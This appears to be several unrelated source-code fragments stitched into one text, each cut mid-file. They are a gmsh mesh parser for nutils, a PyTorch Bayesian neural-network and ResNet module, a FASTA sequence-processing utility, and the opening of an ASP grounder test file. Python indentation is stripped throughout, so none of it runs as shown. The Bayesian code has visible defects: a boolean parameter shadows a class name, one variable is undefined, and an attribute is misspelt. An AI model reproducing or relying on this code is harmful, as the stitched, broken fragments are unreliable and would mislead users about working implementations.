bari = tuple(numpy.array([index[::-1] for index in numpy.ndindex(*enum.shape) if sum(index) == degree]).T)
enum[bari] = numpy.arange(cnodes.shape[1]) # maps baricentric index to corresponding enumerated index
shuffle = vnodes.argsort(axis=1)
cnodes = cnodes[:,nodeorder] # convert from gmsh to nutils order
for i in range(ndims): # strategy: apply shuffle to cnodes by sequentially swapping vertices...
for j in range(i+1, ndims+1): # ...considering all j > i pairs...
m = shuffle[:,i] == j # ...and swap vertices if vertex j is shuffled into i...
r = enum.swapaxes(i,j)[bari] # ...using the enum table to generate the appropriate renumbering
cnodes[m,:] = cnodes[numpy.ix_(m,r)]
m = shuffle[:,j] == i
shuffle[m,j] = shuffle[m,i] # update shuffle to track changed vertex positions
vnodes.sort(axis=1)
nnodes = vnodes[:,-1].max()+1
vtags, btags, ptags = {}, {}, {}
edge_vertices = numpy.arange(ndims+1).repeat(ndims).reshape(ndims, ndims+1)[:,::-1].T # nedges x ndims
for nd, name, ielems in tags:
if nd == ndims:
vtags[name] = numpy.array(ielems)
elif nd == ndims-1:
edgenodes = bnodes[ielems]
nodemask = numeric.asboolean(edgenodes.ravel(), size=nnodes, ordered=False)
ielems, = (nodemask[vnodes].sum(axis=1) >= ndims).nonzero() # all elements sharing at least ndims edgenodes
edgemap = {tuple(b): (ielem, iedge) for ielem, a in zip(ielems, vnodes[ielems[:,_,_], edge_vertices[_,:,:]]) for iedge, b in enumerate(a)}
btags[name] = numpy.array([edgemap[tuple(sorted(n))] for n in edgenodes])
elif nd == 0:
ptags[name] = pnodes[ielems][...,0]
log.info('\n- '.join(['loaded {}d gmsh topology consisting of #{} elements'.format(ndims, len(cnodes))]
+ [name + ' groups: ' + ', '.join('{} #{}'.format(n, len(e)) for n, e in tags.items())
for name, tags in (('volume', vtags), ('boundary', btags), ('point', ptags)) if tags]))
return dict(nodes=vnodes, cnodes=cnodes, coords=coords, tags=vtags, btags=btags, ptags=ptags)
@log.withcontext
@types.apply_annotations
def gmsh(fname:util.binaryfile, name='gmsh'):
"""Gmsh parser
Parser for Gmsh files in `.msh` format. Only files with physical groups are
supported. See the `Gmsh manual
<http://geuz.org/gmsh/doc/texinfo/gmsh.html>`_ for details.
Parameters
----------
fname : :class:`str` or :class:`io.BufferedIOBase`
Path to mesh file or mesh file object.
name : :class:`str` or :any:`None`
Name of parsed topology, defaults to 'gmsh'.
Returns
-------
topo : :class:`nutils.topology.SimplexTopology`
Topology of parsed Gmsh file.
geom : :class:`nutils.function.Array`
Isoparametric map.
"""
with fname as f:
return simplex(name=name, **parsegmsh(f))
def simplex(nodes, cnodes, coords, tags, btags, ptags, name='simplex'):
'''Simplex topology.
Parameters
----------
nodes : :class:`numpy.ndarray`
Vertex indices as (nelems x ndims+1) integer array, sorted along the
second dimension. This table fully determines the connectivity of the
simplices.
cnodes : :class:`numpy.ndarray`
Coordinate indices as (nelems x ncnodes) integer array following Nutils'
conventions for Bernstein polynomials. The polynomial degree is inferred
from the array shape.
coords : :class:`numpy.ndarray`
Coordinates as (nverts x ndims) float array to be indexed by ``cnodes``.
tags : :class:`dict`
Dictionary of name->element numbers. Element order is preserved in the
resulting volumetric groups.
btags : :class:`dict`
Dictionary of name->edges, where edges is a (nedges x 2) integer array
containing pairs of element number and edge number. The segments are
assigned to boundary or interfaces groups automatically while otherwise
preserving order.
ptags : :class:`dict`
Dictionary of name->node numbers referencing the ``nodes`` table.
name : :class:`str`
Name of simplex topology.
Returns
-------
topo : :class:`nutils.topology.SimplexTopology`
Topology with volumetric, boundary and interface groups.
geom : :class:`nutils.function.Array`
Geometry function.
'''
nverts = len(coords)
nelems, ncnodes = cnodes.shape
ndims = nodes.shape[1] - 1
assert len(nodes) == nelems
assert numpy.greater(nodes[:,1:], nodes[:,:-1]).all(), 'nodes must be sorted'
if ncnodes == ndims+1:
degree | |
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from sklearn.metrics import roc_auc_score
from torchvision import datasets, transforms
from tqdm import tqdm, trange
# for CBB and MCBB
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
eps = 1e-20
class Gaussian:
def __init__(self, mu, rho):
self.mu = mu
self.rho = rho
self.normal = torch.distributions.Normal(0, 1)
@property
def sigma(self):
return torch.log1p(torch.exp(self.rho))
def sample(self):
epsilon = self.normal.sample(self.rho.size()).to(DEVICE)
return self.mu + self.sigma * epsilon
def log_prob(self, input):
return (
-math.log(math.sqrt(2 * math.pi))
- torch.log(self.sigma + eps)
- ((input - self.mu) ** 2) / (2 * self.sigma ** 2)
).sum()
class GaussianPrior:
def __init__(self, mu, sigma):
self.mu = mu
self.sigma = sigma
def log_prob(self, input):
return (
-math.log(math.sqrt(2 * math.pi))
- torch.log(self.sigma)
- ((input - self.mu) ** 2) / (2 * self.sigma ** 2)
).sum()
class BayesianLinear(nn.Module):
"""
TODO: refact initialization of parameter rho
"""
def __init__(self, n_input, n_output, sigma1, lower_bound, upper_bounnd):
super().__init__()
self.n_input = n_input
self.n_output = n_output
self.w_mu = nn.Parameter(
torch.Tensor(n_output, n_input).normal_(0, math.sqrt(2 / n_input))
) # todo
self.w_rho = nn.Parameter(
torch.Tensor(n_output, n_input).uniform_(lower_bound, upper_bounnd)
)
# self.w_rho = nn.Parameter(torch.Tensor(n_output, n_input).uniform_(-2.253,-2.252))
self.w = Gaussian(self.w_mu, self.w_rho)
self.b_mu = nn.Parameter(torch.Tensor(n_output).normal_(0, math.sqrt(2 / n_input)))
# self.b_rho = nn.Parameter(torch.Tensor(n_output).uniform_(-5,-4))
self.b_rho = nn.Parameter(torch.Tensor(n_output).uniform_(lower_bound, upper_bounnd))
self.b = Gaussian(self.b_mu, self.b_rho)
# Prior: Gaussian
self.w_prior = GaussianPrior(0, sigma1)
self.b_prior = GaussianPrior(0, sigma1)
self.log_prior = 0
self.log_variational_posterior = 0
self.sigma_mean = 0
self.sigma_std = 0
def forward(self, input, sample=False):
if self.training or sample:
w = self.w.sample()
b = self.b.sample()
else:
w = self.w_mu
b = self.b_mu
self.log_prior = self.w_prior.log_prob(w) + self.b_prior.log_prob(b)
self.log_variational_posterior = self.w.log_prob(w) + self.b.log_prob(b)
self.sigma_mean = self.w.sigma.mean()
self.sigma_std = self.w.sigma.std()
return F.linear(input, w, b)
class BayesianConv2D(nn.Module):
def __init__(self, in_channels, out_channels, sigma1, kernel_size=3, stride=1, padding=1):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.w_mu = nn.Parameter(
torch.Tensor(out_channels, in_channels, kernel_size, kernel_size).normal_(
0,
math.sqrt(2 / (out_channels * in_channels * kernel_size * kernel_size)),
)
)
# self.w_rho = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size, kernel_size).uniform_(-5,-4))
self.w_rho = nn.Parameter(
torch.Tensor(out_channels, in_channels, kernel_size, kernel_size).uniform_(
-2.253, -2.252
)
)
self.w = Gaussian(self.w_mu, self.w_rho)
# prior: Gaussian
self.w_prior = GaussianPrior(0, sigma1)
self.log_prior = 0
self.log_variational_posterior = 0
def forward(self, input, sample=False):
if self.training or sample:
w = self.w.sample()
else:
w = self.w_mu
self.log_prior = self.w_prior.log_prob(w)
self.log_variational_porsterior = self.w.log_prob(w)
return F.conv2d(input, w, bias=None, stride=self.stride, padding=self.padding)
def BayesianConv3x3(in_channels, out_channels, sigma1, stride=1):
return BayesianConv2D(
in_channels, out_channels, sigma1, kernel_size=3, stride=stride, padding=1
)
class TLU(nn.Module):
def __init__(self, num_features):
super().__init__()
self.num_features = num_features
self.tau = nn.parameter.Parameter(torch.Tensor(1, num_features, 1, 1), requires_grad=True)
self.reset_parameters()
def reset_parameters(self):
nn.init.kaiming_normal_(self.tau)
# nn.init.zeros_(self.tau)
def forward(self, x):
return torch.max(x, self.tau)
class FRN(nn.Module):
def __init__(self, num_features, eps=1e-6, is_eps_learnable=False):
super().__init__()
self.num_features = num_features
self.init_eps = eps
self.is_eps_learnable = is_eps_learnable
self.weight = nn.parameter.Parameter(
torch.Tensor(1, num_features, 1, 1), requires_grad=True
)
self.bias = nn.parameter.Parameter(torch.Tensor(1, num_features, 1, 1), requires_grad=True)
if is_eps_learnable:
self.eps = nn.Parameter(torch.Tensor(1))
else:
self.eps = torch.tensor(eps)
self.reset_parameters()
def reset_parameters(self):
nn.init.kaiming_normal_(self.weight)
nn.init.kaiming_normal_(self.bias)
# nn.init.ones_(self.weight)
# nn.init.zeros_(self.bias)
if self.is_eps_learnable:
nn.init.constant_(self.eps, self.init_eps)
def forward(self, x):
nu2 = x.pow(2).mean(dim=[2, 3], keepdim=True)
x = x * torch.rsqrt(nu2 + self.eps.abs())
x = self.weight * x + self.bias
return x
class ResidualBlock(nn.Module):
"""
distinguish between batch normalisation and filter response normalisation
"""
def __init__(self, in_channels, out_channels, sigma1, FRN, stride=1, downsample=None):
super().__init__()
self.conv1 = BayesianConv3x3(in_channels, out_channels, sigma1, stride)
self.conv2 = BayesianConv3x3(out_channels, out_channels, sigma1)
if FRN:
self.frn1 = FRN(out_channels)
self.tlu1 = TLU(out_channels)
self.frn2 = FRN(out_channels)
self.tlu2 = TLU(out_channels)
else:
self.frn1 = nn.BatchNorm2d(out_channels)
self.tlu1 = nn.ReLU(inplace=True)
self.frn2 = nn.BatchNorm2d(out_channels)
self.tlu2 = nn.ReLU(inplace=True)
self.downsample = downsample
self.log_prior = 0
self.log_variational_posterior = 0
self.sigma_mean = 0
self.sigma_std = 0
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.frn1(out)
out = self.tlu1(out)
out = self.conv2(out)
out = self.frn2(out)
if self.downsample:
residual = self.downsample(x)
out += residual
out = self.tlu2(out)
self.log_prior = self.conv1.log_prior + self.conv2.log_prior
self.log_variational_posterior = (
self.conv1.log_variational_posterior + self.conv2.log_variational_posterior
)
para = torch.cat((self.conv1.w.sigma.flatten(), self.conv2.w.sigma.flatten()))
self.sigma_mean = para.mean()
self.sigma_std = para.std()
return out
class BayesianResNet14(nn.Module):
"""
distinguish between batch normalisation and filter response normalisation
"""
def __init__(self, block, sigma1, FRN=False, num_class=10):
super().__init__()
self.in_channels = 16
self.conv = BayesianConv3x3(3, 16, sigma1)
if FRN:
self.frn = FRN(out_channels)
self.tlu = TLU(out_channels)
downsample1 = nn.Sequential(BayesianConv3x3(16, 32, sigma1, FRN, 2), FRN(32))
downsample2 = nn.Sequential(BayesianConv3x3(32, 64, sigma1, FRN, 2), FRN(64))
else:
self.frn = nn.BatchNorm2d(16)
self.tlu = nn.ReLU(inplace=True)
downsample1 = nn.Sequential(BayesianConv3x3(16, 32, sigma1, FRN, 2), nn.BatchNorm2d(32))
downsample2 = nn.Sequential(BayesianConv3x3(32, 64, sigma1, FRN, 2), nn.BatchNorm2d(64))
self.block1 = ResidualBlock(16, 16, sigma1, FRN)
self.block2 = ResidualBlock(16, 16, sigma1, FRN)
self.block3 = ResidualBlock(16, 32, sigma1, FRN, 2, downsample1)
self.block4 = ResidualBlock(32, 32, sigma1)
self.block5 = ResidualBlock(32, 64, sigma1, FRN, 2, downsample2)
self.block6 = ResidualBlock(64, 64, sigma1, FRN)
self.avg_pool = nn.AvgPool2d(8)
self.fc = BayesianLinear(64, num_class, sigma1, -2.253, -2.252)
def forward(self, x, sample=False):
out = self.conv(x)
out = self.frn(out)
out = self.tlu(out)
out = self.block1(out)
out = self.block2(out)
out = self.block3(out)
out = self.block4(out)
out = self.block5(out)
out = self.block6(out)
out = self.avg_pool(out)
out = out.view(out.size(0), -1)
out = F.softmax(self.fc(out, sample))
return out
def log_prior(self):
return (
self.conv.log_prior
+ self.block1.log_prior
+ self.block2.log_prior
+ self.block3.log_prior
+ self.block4.log_prior
+ self.block5.log_prior
+ self.block6.log_prior
+ self.fc.log_prior
)
def log_variational_posterior(self):
return (
self.conv.log_variational_posterior
+ self.block1.log_variational_posterior
+ self.block2.log_variational_posterior
+ self.block3.log_variational_posterior
+ self.block4.log_variational_posterior
+ self.block5.log_variational_posterior
+ self.block6.log_variational_posterior
+ self.fc.log_variational_posterior
)
def free_energy(self, input, target, batch_size, num_batches, n_samples, T):
outputs = torch.zeros(batch_size, 10).to(DEVICE)
log_prior = torch.zeros(1).to(DEVICE)
log_variational_posterior = torch.zeros(1).to(DEVICE)
negative_log_likelihood = torch.zeros(1).to(DEVICE)
for i in range(n_samples):
output = self(input, sample=True)
outputs += output / n_samples
log_prior += self.log_prior() / n_samples
log_variational_posterior += self.log_variational_posterior() / n_samples
negative_log_likelihood += (
F.nll_loss(torch.log(output + eps), target, size_average=False) / n_samples
)
# new target function, not absorb T into prior
loss = (
log_variational_posterior - log_prior / T
) + negative_log_likelihood / T * num_batches
corrects = outputs.argmax(dim=1).eq(target).sum().item()
return (
loss,
log_prior,
log_variational_posterior,
negative_log_likelihood,
corrects,
)
class BayesianNetwork(nn.Module):
"""
plain network
"""
def __init__(self, n_units, sigma1, T):
super().__init__()
self.l1 = BayesianLinear(28 * 28, n_units, sigma1, -5, -4)
self.l2 = BayesianLinear(n_units, n_units, sigma1, -5, -4)
self.l3 = BayesianLinear(n_units, 10, sigma1, -5, -4)
def forward(self, x, sample=False):
x = x.view(-1, 28 * 28)
x = F.relu(self.l1(x, sample), inplace=False)
x = F.relu(self.l2(x, sample), inplace=False)
x = F.softmax(self.l3(x, sample))
return x
def log_prior(self):
return self.l1.log_prior + self.l2.log_prior + self.l3.log_prior
def log_variational_posterior(self):
return (
self.l1.log_variational_posterior
+ self.l2.log_variational_posterior
+ self.l3.log_variational_posterior
)
def free_energy(self, input, target, batch_size, num_batches, n_samples, T):
outputs = torch.zeros(batch_size, 10).to(DEVICE)
log_prior = torch.zeros(1).to(DEVICE)
log_variational_posterior = torch.zeros(1).to(DEVICE)
negative_log_likelihood = torch.zeros(1).to(DEVICE)
for i in range(n_samples):
output = self(input, sample=True)
outputs += output / n_samples
log_prior += self.log_prior() / n_samples
log_variational_posterior += self.log_variational_posterior() / n_samples
negative_log_likelihood += (
F.nll_loss(torch.log(output + eps), target, size_average=False) / n_samples
)
# new target function, not absorb T into prior
loss = (
log_variational_posterior - log_prior / T
) + negative_log_likelihood / T * num_batches
corrects = outputs.argmax(dim=1).eq(target).sum().item()
return (
loss,
log_prior,
log_variational_posterior,
negative_log_likelihood,
corrects,
)
# nonBayesian Network
class myLinear(nn.Module):
def __init__(self, n_input, n_output, sigma1):
super().__init__()
self.n_input = n_input
self.n_output = n_output
self.w_mu = nn.Parameter(torch.Tensor(n_output, n_input).normal_(0, math.sqrt(2 / n_input)))
self.b_mu = nn.Parameter(torch.Tensor(n_output).normal_(0, math.sqrt(2 / n_input)))
def forward(self, input, sample=False):
w = self.w_mu
b = self.b_mu
return F.linear(input, w, b)
class myConv2D(nn.Module):
def __init__(self, in_channels, out_channels, sigma1, kernel_size=3, stride=1, padding=1):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.w_mu = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size, kernel_size))
self.reset_para()
def reset_para(self):
nn.init.kaiming_uniform_(self.w_mu, a=math.sqrt(5))
def forward(self, input, sample=False):
w = self.w_mu
return F.conv2d(input, w, bias=None, stride=self.stride, padding=self.padding)
def myConv3x3(in_channels, out_channels, sigma1, stride=1):
return myConv2D(in_channels, out_channels, sigma1, kernel_size=3, stride=stride, padding=1)
class myResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, sigma1, stride=1, downsample=None):
super().__init__()
self.conv1 = myConv3x3(in_channels, out_channels, sigma1, stride)
self.frn1 = nn.BatchNorm2d(out_channels)
self.tlu1 = nn.ReLU(inplace=True)
self.conv2 = myConv3x3(out_channels, out_channels, sigma1)
self.frn2 = nn.BatchNorm2d(out_channels)
self.tlu2 = nn.ReLU(inplace=True)
self.downsample = downsample
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.frn1(out)
out = self.tlu1(out)
out = self.conv2(out)
out = self.frn2(out)
if self.downsample:
residual = self.downsample(x)
out += residual
out = self.tlu2(out)
return out
class myResNet14(nn.Module):
def __init__(self, sigma1, num_class=10):
super().__init__()
self.in_channels = 16
self.conv = myConv3x3(3, 16, sigma1)
self.frn = nn.BatchNorm2d(16)
self.tlu = nn.ReLU(inplace=True)
self.block1 = myResidualBlock(16, 16, sigma1)
self.block2 = myResidualBlock(16, 16, sigma1)
downsample1 = | |
are required to start with START codons, and if this
# is not a START codon, then do not start a new ORF
if from_start and start == None and not (codon in Alphabet.START):
continue
# if we are not currently in an ORF, initialize one
if not start != None:
start, length = i - 2, 0
# increment the length of the current ORF
length += 3
# if the final ORF is the longest, record it
# break ties by preferring the lower start position
if start != None and ((length, max_start) > (max_length, start)):
max_start, max_length = start, length
return (max_start, max_length)
def _get_orf(dna, all_frames=False, from_start=False, translate=True):
dna = dna.translate(FastaEntry.ungapper).upper()
if all_frames:
cds_start, cds_length = find_max_orf(dna, from_start=from_start)
if cds_start is None:
return ""
cds = dna[cds_start : cds_start + cds_length]
if translate:
return translate_dna(cds)
else:
return cds
else:
aa = translate_dna(dna)
if from_start and not aa[0] == "M":
aa = ""
return aa
def translate(gen, all_frames=False, from_start=False, cds=False):
for seq in gen:
orf = _get_orf(
seq.seq, all_frames=all_frames, from_start=from_start, translate=not cds
)
yield FastaEntry(header=seq.header, seq=orf)
def uniq(gen, repeated=False, uniq=False, count=False):
seqs = collections.OrderedDict()
for seq in gen:
try:
seqs[seq] += 1
except KeyError:
seqs[seq] = 1
if repeated:
sgen = ((k, v) for k, v in seqs.items() if v > 1)
elif uniq:
sgen = ((k, v) for k, v in seqs.items() if v == 1)
else:
sgen = seqs.items()
if count:
for k, v in sgen:
yield "{}\t{}".format(v, k.header)
else:
for k, v in sgen:
yield k
def pack(gen, sep):
seqs = collections.OrderedDict()
for seq in gen:
if seq.seq in seqs:
seqs[seq.seq].append(seq.header)
else:
seqs[seq.seq] = [seq.header]
for q, h in seqs.items():
seq = FastaEntry(header=sep.join(h), seq=q)
yield seq
def unpack(gen, sep):
for seq in gen:
headers = seq.header.split(sep)
for header in headers:
yield FastaEntry(header=header, seq=seq.seq)
def uniq_headers(gen, removed=False):
seqs = collections.OrderedDict()
for seq in gen:
if seq.header in seqs:
if removed:
seq.print(color=False, out=args.removed)
else:
seqs[seq.header] = seq.seq
for header, sequence in seqs.items():
seq = FastaEntry(header=header, seq=sequence)
yield seq
# =================
# UTILITY FUNCTIONS
# =================
def _counter_caser(counter, lower=False):
"""
Sums cases in Collections.Counter object
"""
if lower:
out = counter + collections.Counter(
{k.lower(): v for k, v in counter.items() if k.isupper()}
)
out = out - collections.Counter(
{k: v for k, v in counter.items() if k.isupper()}
)
else:
out = counter + collections.Counter(
{k.upper(): v for k, v in counter.items() if k.islower()}
)
out = out - collections.Counter(
{k: v for k, v in counter.items() if k.islower()}
)
return out
def _sum_lower(counter):
lc = [v for k, v in counter.items() if k in string.ascii_lowercase]
return sum(lc)
def _guess_type(counts):
"""
Predict sequence type from character counts (dna|rna|prot|ambiguous|illegal)
"""
if isinstance(counts, str):
counts = collections.Counter(counts)
elif isinstance(counts, FastaEntry):
counts = collections.Counter(counts.seq)
# Convert all to upper case
counts = _counter_caser(counts)
# Remove gaps from Counter
counts = collections.Counter(
{k: n for k, n in counts.items() if k not in Alphabet.GAP}
)
# If all chars are in ACGT
if set(counts) <= Alphabet.DNA:
stype = "ambiguous" if sum(counts.values()) < 3 else "dna"
# If all chars in ACGU
elif set(counts) <= Alphabet.RNA:
stype = "rna"
# If has any chars unique to proteins (EFILQPXJZ*)
elif set(counts) & Alphabet.PROT_EXC:
if set(counts) <= Alphabet.PROT | Alphabet.PROT_AMB:
stype = "prot"
else:
stype = "illegal"
# If all the residues could be aa, DNA, or RNA
elif set(counts) <= (Alphabet.PROT | Alphabet.PROT_AMB):
# If more than 80% look like nucleic acids, set 'amb_nucl'
if (
sum([counts[x] for x in "ACGTUN" if x in counts]) / sum(counts.values())
) > 0.8:
if "U" in counts:
stype = "illegal" if "T" in counts else "rna"
else:
stype = "dna"
# Otherwise set as ambibuous
else:
stype = "ambiguous"
# If none of these match, something is horribly wrong with your
# sequence
else:
stype = "illegal"
return stype
def _headtailtrunk(seq, first=None, last=None):
"""
This function is used by the Head and Tail classes to portray partial
sections of sequences.
"""
outseq = FastaEntry(seq.header, seq.seq)
if first and last:
if first + last < len(seq.seq):
outseq.header = _parse_header_firstword(
seq.header
) + "|TRUNCATED:first-{}_last-{}".format(first, last)
outseq.seq = "{}{}{}".format(seq.seq[0:first], "...", seq.seq[-last:])
elif first:
outseq.header = _parse_header_firstword(
seq.header
) + "|TRUNCATED:first-{}".format(first)
outseq.seq = seq.seq[0:first]
elif last:
outseq.header = _parse_header_firstword(
seq.header
) + "|TRUNCATED:last-{}".format(last)
outseq.seq = seq.seq[-last:]
elif first == 0 and last == 0:
_err("Illegal empty sequence, dying ...")
return outseq
def _ascii_histchar(dif, chars=" .~*O"):
if dif <= 0:
return chars[0]
elif dif < 0.25:
return chars[1]
elif dif < 0.5:
return chars[2]
elif dif < 0.75:
return chars[3]
else:
return chars[4]
def _err(msg):
sys.exit(msg)
def ambiguous2perl(pattern):
DNA_AMB = {
"R": "AG",
"Y": "CT",
"S": "GC",
"W": "AT",
"K": "GT",
"M": "AC",
"B": "CGT",
"D": "AGT",
"H": "ACT",
"V": "ACG",
"N": "ACGT",
}
perlpat = []
in_bracket = False
escaped = False
for c in pattern:
amb = c in DNA_AMB
if c == "\\":
escaped = True
continue
elif escaped:
c = c if amb else "\\" + c
escaped = False
elif amb:
v = DNA_AMB[c]
c = v if in_bracket else "[%s]" % v
elif c == "[":
in_bracket = True
elif c == "]":
in_bracket = False
perlpat.append(c)
return "".join(perlpat)
def translate_dna(dna):
# remove gaps
dna = dna.translate(FastaEntry.ungapper).upper()
aa = []
for i in range(2, len(dna), 3):
codon = dna[i - 2 : i + 1]
if codon in FastaEntry.codon_table:
aa.append(FastaEntry.codon_table[codon])
else:
aa.append("X")
return "".join(aa)
def _parse_header_firstword(h, delimiter="[ \t]"):
return re.sub("%s.*" % delimiter, "", h)
def _parse_header_description(h):
return re.sub(r"^\S+\s*", "", h)
def _parse_header_add_suffix(h, suffix):
return re.sub(r"^(\S+)(.*)", "\\1|%s\\2" % suffix, h)
def _parse_header_add_tag(h, tag, value):
return re.sub(r"^(\S+)(.*)", "\\1 %s=%s\\2" % (tag, value), h)
def _parse_header_subseq(h, a, b):
header = "%s|subseq(%d..%d) %s" % (
_parse_header_firstword(h),
a,
b,
_parse_header_description(h),
)
return header.strip()
def _parse_header_permute(h, start, end, wordsize):
header = "%s|permutation:start=%d;end=%d;word_size=%d %s" % (
_parse_header_firstword(h),
start,
end,
wordsize,
_parse_header_description(h),
)
return header.strip()
def _parse_header_ncbi_format(h, fields):
raise NotImplementedError
def _parse_header_regex_group(h, regex):
raise NotImplementedError
# =================
# CLASS DEFINITIONS
# =================
class Alphabet:
# Including U, for selenocysteine, and * for STOP
PROT = set("ACDEFGHIKLMNPQRSTUVWYX*")
PROT_UNK = set("X")
PROT_AMB = set("BZJ")
PROT_EXC = set("EFILQPXJZ*") # unique to protein sequences
DNA = set("ACGTN")
DNA_UNK = set("N")
DNA_AMB = set("RYSWKMDBHV")
RNA = set("ACGUN")
RNA_UNK = set("N")
RNA_AMB = set("RYSWKMDBHV")
GAP = set(".-_")
STOP = {"TAG", "TAA", "TGA", "UAG", "UAA", "UGA"}
START = {"ATG", "AUG"}
class Colors:
OFF = chr(27) + r"[0;0m"
RED = chr(27) + r"[0;31m"
GREEN = chr(27) + r"[0;32m"
YELLOW = chr(27) + r"[0;33m"
MAGENTA = chr(27) + r"[0;35m"
CYAN = chr(27) + r"[0;36m"
WHITE = chr(27) + r"[0;37m"
BLUE = chr(27) + r"[0;34m"
BOLD_RED = chr(27) + r"[1;31m"
BOLD_GREEN = chr(27) + r"[1;32m"
BOLD_YELLOW = chr(27) + r"[1;33m"
BOLD_MAGENTA = chr(27) + r"[1;35m"
BOLD_CYAN = chr(27) + r"[1;36m"
BOLD_WHITE = chr(27) + r"[1;37m"
BOLD_BLUE = chr(27) + r"[1;34m"
patstr = chr(27) + r"\[[0-9;]+m"
pat = re.compile(patstr)
COLORS = {
"red": RED,
"green": GREEN,
"yellow": YELLOW,
"magenta": MAGENTA,
"cyan": CYAN,
"white": WHITE,
"blue": BLUE,
"bold_red": BOLD_RED,
"bold_green": BOLD_GREEN,
"bold_yellow": BOLD_YELLOW,
"bold_magenta": BOLD_MAGENTA,
"bold_cyan": BOLD_CYAN,
"bold_white": BOLD_WHITE,
"bold_blue": BOLD_BLUE,
}
class ColorAA:
def __init__(self):
self.group = [
["LVGAIP", "aliphatic", Colors.BOLD_BLUE],
["FYW", "aromatic", Colors.BOLD_RED],
["SEKDRTNQH", "polar", Colors.BOLD_GREEN],
["MCU", "thiol", Colors.BOLD_YELLOW],
]
# add lower cases
self.group = [[l + l.lower(), g, c] for l, g, c in self.group]
def color(self, a):
for chars, group, color in self.group:
if a in chars:
return Colors.OFF + a + color
return a
class ColorString:
def __init__(self, seq=None, bgcolor=Colors.OFF, default=Colors.BOLD_RED):
self.bgcolor = bgcolor
self.default = default
self.cind = []
if seq:
self.append(seq)
def append(self, thing, bg=None):
bg = bg if bg else Colors.OFF
if isinstance(thing, FastaEntry):
thing = thing.colseq
if isinstance(thing, ColorString):
newcind = thing.cind
elif isinstance(thing, str):
newcind = []
pos = []
color_on = False
for s in re.split("((?:{})+)".format(Colors.patstr), thing):
if s and s[0] == chr(27):
# if there are multiple colors, take only the last
col = chr(27) + s.split(chr(27))[-1]
# start a new color
if not color_on and col != self.bgcolor:
newcind.append([pos[-1], None, col])
# end old color | |
<filename>tests/asp/weakConstraints/6-still_live-7-1.asp.gringo.test.py<gh_stars>10-100
input = """
1 2 0 0
1 3 0 0
1 4 0 0
1 5 0 0
1 6 0 0
1 7 0 0
1 8 0 0
1 9 0 0
1 10 0 0
1 11 0 0
1 12 0 0
1 13 0 0
1 14 0 0
1 15 0 0
1 16 0 0
1 17 0 0
1 18 0 0
1 19 0 0
1 20 0 0
2 21 3 0 3 22 23 24
1 25 1 0 21
1 1 1 0 25
2 26 3 0 3 23 27 22
1 28 1 0 26
1 1 1 0 28
2 29 3 0 3 27 30 23
1 31 1 0 29
1 1 1 0 31
2 32 3 0 3 30 33 27
1 34 1 0 32
1 1 1 0 34
2 35 3 0 3 22 36 37
1 38 1 0 35
1 1 2 1 24 38
2 39 5 0 3 23 24 37 40 36
2 41 5 0 4 23 24 37 40 36
1 42 2 1 41 39
1 1 2 1 22 42
2 43 5 0 3 27 22 40 44 37
2 45 5 0 4 27 22 40 44 37
1 46 2 1 45 43
1 1 2 1 23 46
2 47 5 0 3 30 23 44 48 40
2 49 5 0 4 30 23 44 48 40
1 50 2 1 49 47
1 1 2 1 27 50
2 51 5 0 3 33 27 48 52 44
2 53 5 0 4 33 27 48 52 44
1 54 2 1 53 51
1 1 2 1 30 54
2 55 3 0 3 30 52 48
1 56 1 0 55
1 1 2 1 33 56
2 57 3 0 3 36 58 24
1 59 1 0 57
1 1 1 0 59
2 60 5 0 3 37 58 24 61 22
2 62 5 0 4 37 58 24 61 22
1 63 2 1 62 60
1 1 2 1 36 63
2 64 8 0 3 40 36 61 22 65 58 23 24
2 66 8 0 4 40 36 61 22 65 58 23 24
1 67 2 1 66 64
1 1 2 1 37 67
2 68 8 0 3 44 37 65 23 69 61 27 22
2 70 8 0 4 44 37 65 23 69 61 27 22
1 71 2 1 70 68
1 1 2 1 40 71
2 72 8 0 3 48 40 69 27 73 65 30 23
2 74 8 0 4 48 40 69 27 73 65 30 23
1 75 2 1 74 72
1 1 2 1 44 75
2 76 8 0 3 52 44 73 30 77 69 33 27
2 78 8 0 4 52 44 73 30 77 69 33 27
1 79 2 1 78 76
1 1 2 1 48 79
2 80 5 0 3 48 77 33 73 30
2 81 5 0 4 48 77 33 73 30
1 82 2 1 81 80
1 1 2 1 52 82
2 83 3 0 3 52 77 33
1 84 1 0 83
1 1 1 0 84
2 85 3 0 3 58 86 36
1 87 1 0 85
1 1 1 0 87
2 88 5 0 3 61 86 36 89 37
2 90 5 0 4 61 86 36 89 37
1 91 2 1 90 88
1 1 2 1 58 91
2 92 8 0 3 65 58 89 37 93 86 40 36
2 94 8 0 4 65 58 89 37 93 86 40 36
1 95 2 1 94 92
1 1 2 1 61 95
2 96 8 0 3 69 61 93 40 97 89 44 37
2 98 8 0 4 69 61 93 40 97 89 44 37
1 99 2 1 98 96
1 1 2 1 65 99
2 100 8 0 3 73 65 97 44 101 93 48 40
2 102 8 0 4 73 65 97 44 101 93 48 40
1 103 2 1 102 100
1 1 2 1 69 103
2 104 8 0 3 77 69 101 48 105 97 52 44
2 106 8 0 4 77 69 101 48 105 97 52 44
1 107 2 1 106 104
1 1 2 1 73 107
2 108 5 0 3 73 105 52 101 48
2 109 5 0 4 73 105 52 101 48
1 110 2 1 109 108
1 1 2 1 77 110
2 111 3 0 3 77 105 52
1 112 1 0 111
1 1 1 0 112
2 113 3 0 3 86 114 58
1 115 1 0 113
1 1 1 0 115
2 116 5 0 3 89 114 58 117 61
2 118 5 0 4 89 114 58 117 61
1 119 2 1 118 116
1 1 2 1 86 119
2 120 8 0 3 93 86 117 61 121 114 65 58
2 122 8 0 4 93 86 117 61 121 114 65 58
1 123 2 1 122 120
1 1 2 1 89 123
2 124 8 0 3 97 89 121 65 125 117 69 61
2 126 8 0 4 97 89 121 65 125 117 69 61
1 127 2 1 126 124
1 1 2 1 93 127
2 128 8 0 3 101 93 125 69 129 121 73 65
